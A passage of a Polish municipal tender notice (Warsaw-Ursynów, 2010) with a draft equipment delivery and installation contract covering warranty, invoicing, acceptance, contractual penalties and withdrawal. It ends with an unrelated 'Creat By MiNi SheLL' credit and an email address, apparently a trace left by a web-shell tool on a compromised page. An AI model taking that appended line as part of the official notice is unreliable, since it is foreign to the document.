z Zamawiającym w okresie od  09.08.2010 r. do 20.08.2010 r., jednak nie później niż przed upływem ostatecznego terminu określonego w § 2 umowy. O dokładnym terminie dostawy i montażu Zamawiający zostanie poinformowany przez Wykonawcę, nie później niż na 2 dni robocze przed planowaną dostawą z montażem.
3.	Wraz z dostawą Przedmiotu Umowy, Wykonawca zobowiązany jest do przekazania wszelkich niezbędnych dokumentów z nim związanych i przydatnych do eksploatacji 
(w tym: karty gwarancyjne, certyfikaty CE, instrukcji obsługi i konserwacji oraz innych dokumentów wydanych przez producenta w języku polskim lub wraz z tłumaczeniem tych dokumentów na język polski).
4.	Do czasu dostarczenia i montażu Przedmiotu Umowy do miejsca, o którym mowa w ust. 1, po uprzednim sprawdzeniu jego kompletności, sprawności i zgodności z warunkami określonymi w niniejszej umowie, ryzyko wszelkich niebezpieczeństw z nim związanych, a w szczególności uszkodzenia i utraty, obciążają Wykonawcę.
5.	Wykonawca ponosi odpowiedzialność za uszkodzenia substancji budynku i zagospodarowania terenu powstałe w trakcie dostaw i montażu wyposażenia.
6.	Wykonawca nie może samodzielnie dokonywać napraw związanych z uszkodzeniem substancji budynku i zagospodarowania terenu.
7.	Wykonawca udziela gwarancji na Przedmiot Umowy na okres 24 miesięcy od daty podpisania protokółu zdawczo-odbiorczego, o którym mowa w § 7 ust. 1, przy czym dokumentem gwarancyjnym jest niniejsza umowa.
8.	Wykonawca zobowiązuje się do usunięcia wad w dostarczonym Przedmiocie Umowy, 
 w terminie nie dłuższym niż 5 dni robocze od zawiadomienia telefonicznego lub faksem.
9.	W okresie gwarancji Wykonawca nie może odmówić wymiany urządzeń na nowe, wolne od wad w terminie wyznaczonym przez Zamawiającego w przypadku:
a)	niewykonania naprawy w terminie określonym w ust. 7,
b)	ponownego wystąpienia wad po wykonaniu trzech kolejnych napraw.

§ 4
Obowiązki Zamawiającego
Do obowiązków Zamawiającego należy:
1.	sprawdzenie i odbiór Przedmiotu Umowy nie później niż w ciągu 7 dni od daty zgłoszenia przez Wykonawcę gotowości do odbioru
2.	zapłata wynagrodzenia przysługującego Wykonawcy, określonego w § 5 ust. 1.

§ 5
Wynagrodzenie
1.	Wynagrodzenie Wykonawcy za wykonanie Przedmiotu Umowy określonego w § 1 umowy wynosi                     zł brutto (słownie:                                               ), w tym:                             zł netto                                                             oraz                            zł podatek VAT.
2.	W wynagrodzeniu zostały uwzględnione wszelkie koszty związane z wykonaniem Przedmiotu Umowy, w tym m.in. koszty: transportu, rozładunku, montażu oraz wszelkie inne wydatki niezbędne do prawidłowego wykonania Przedmiotu Umowy.
3.	Wynagrodzenie Wykonawcy nie podlega waloryzacji.

§ 6
Fakturowanie i rozliczenia
1.	Rozliczenie wynagrodzenia za wykonanie Przedmiotu Umowy nastąpi jedną fakturą wystawioną na podstawie protokółu zdawczo-odbiorczego, o którym mowa w § 7 ust. 1.
2.	Wynagrodzenie Wykonawcy płatne będzie przelewem na rachunek bankowy Wykonawcy wskazany w fakturze VAT, w terminie do 21 dni, liczonych od daty dostarczenia prawidłowo wystawionej faktury do siedziby Zamawiającego.
3.	Za termin zapłaty faktury uznaje się dzień, w którym Zamawiający polecił swojemu bankowi przelać określoną kwotę na rachunek wskazany w fakturze.
4.	Faktura będzie wystawiona na miasto stołeczne Warszawa, plac Bankowy 3/5, 
00-950 Warszawa, NIP 525-22-48-481.
5.	Jako płatnika należy w fakturze wskazać Dzielnicę Ursynów, al. KEN 61, 
02-777 Warszawa.
6.	Wykonawca oświadcza, że jest podatnikiem podatku od towarów i usług VAT - 
NIP                                                        i jest uprawniony do wystawiania faktur VAT.
7.	Za nieterminową realizację faktury Wykonawcy przysługują odsetki ustawowe.
8.	Za uszkodzenia substancji budynku i zagospodarowania terenu, powstałe w trakcie dostaw i montażu Zamawiający obciąży Wykonawcę poprzez obniżenie wynagrodzenia opisanego w § 5 ust. 1. Na tę okoliczność Zamawiający sporządzi odpowiednią kalkulację.

§ 7
Odbiory
1.	Odbiór Przedmiotu Umowy nastąpi protokółem zdawczo-odbiorczym spisanym pomiędzy Stronami z udziałem Użytkownika, po uprzednim sprawdzeniu jego kompletności, sprawności i zgodności z warunkami określonymi w niniejszej Umowie.
2.	Jeżeli w toku czynności odbioru zostaną stwierdzone wady, Zamawiającemu będą przysługiwały następujące uprawnienia, w przypadku:
1)	wad nadających się do usunięcia - Zamawiający odmówi odbioru do czasu usunięcia wad, wyznaczając jednocześnie termin na ich usunięcie,
2)	wad nie nadających się do usunięcia - Zamawiający może odstąpić od umowy lub żądać dostarczenia nowego Przedmiotu Umowy, zachowując przy tym prawo do naliczania kar w trybie ustalonym w § 8.
3.	Wykonawca oświadcza, że dostarczony Przedmiot Umowy jest fabrycznie nowy i wolny od wad fizycznych i prawnych, nie mają do niego praw osoby trzecie, nie jest przedmiotem żadnego postępowania i zabezpieczenia.

§ 8
Kary umowne
1.	Wykonawca jest zobowiązany do zapłaty kar umownych z tytułu:
1)	zwłoki w wykonaniu Przedmiotu Umowy w wysokości 3% wartości brutto wynagrodzenia określonego w § 5 ust. 1 za każdy rozpoczęty dzień zwłoki licząc odpowiednio od upływu terminu określonego w § 2 umowy;
2)	zwłoki w wysokości 3% wartości brutto wynagrodzenia w przypadku niedotrzymania terminów usunięcia wad lub dostarczenia nowego Przedmiotu Umowy, o których mowa w § 7 ust. 2.
2.	Zamawiający zastrzega sobie prawo do potrącenia kar umownych z wynagrodzenia przysługującego Wykonawcy bez wcześniejszego wezwania do zapłaty.
3.	Łączna wysokość naliczonych Wykonawcy kar umownych nie może przekroczyć 20% wynagrodzenia brutto określonego w § 5 ust. 1.
4.	Postanowienia dotyczące kar umownych nie wyłączają prawa Zamawiającego do dochodzenia odszkodowania uzupełniającego na zasadach ogólnych Kodeksu cywilnego, jeżeli wartość szkody przekroczy wysokość kwot wynikających z naliczonych kar umownych.

§ 9
Odstąpienie od umowy
Zamawiający może odstąpić od niniejszej Umowy, na mocy jednostronnego złożonego 
w formie pisemnej oświadczenia, bez konieczności wcześniejszego wyznaczania terminu na wykonanie Przedmiotu Umowy, w przypadku, gdy:
1.	Wykonawca opóźnia się z rozpoczęciem lub wykończeniem Przedmiotu Umowy tak dalece, że nie jest prawdopodobne, żeby zdołał je ukończyć w czasie umówionym.
2.	Wykonawca wykonuje Przedmiot Umowy w sposób wadliwy albo sprzeczny z umową, po wcześniejszym wezwaniu do zmiany sposobu wykonania wraz z wyznaczeniem terminu i  jego bezskutecznym upływie.
3.	Przedmiot Umowy ma wady istotne, które nie dadzą się usunąć albo, gdy z okoliczności wynika, że Wykonawca nie zdoła ich usunąć w czasie odpowiednim.
4.	W przypadku odstąpienia od umowy postanowienia niniejszego paragrafu oraz § 8 pozostają wiążące dla stron.

§ 10
Postanowienia końcowe
1.	Ewentualne spory mogące wyniknąć z realizacji umowy będą rozstrzygane w pierwszej kolejności polubownie na zasadzie porozumienia Stron. W przypadku braku takiego porozumienia sporne kwestie rozstrzygane będą przez sąd właściwy dla siedziby Zamawiającego.
2.	Wszelkie zmiany i uzupełnienia treści umowy wymagają pod rygorem nieważności sporządzenia aneksu do umowy i podpisania przez obie Strony.
3.	Prawa i obowiązki wynikające z niniejszej Umowy nie mogą być przenoszone na osoby trzecie bez pisemnej zgody obu Stron.
4.	W sprawach nieuregulowanych niniejszą umową mają zastosowanie m.in. przepisy ustawy Prawo Zamówień Publicznych i Kodeksu cywilnego.
5.	Umowa niniejsza została sporządzona w czterech jednobrzmiących egzemplarzach, po dwa dla każdej ze Stron.






    	Zamawiający                                                                            Wykonawca






Załączniki dostępne na stronie internetowej Zamawiającego : www.ursynow.waw.pl</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com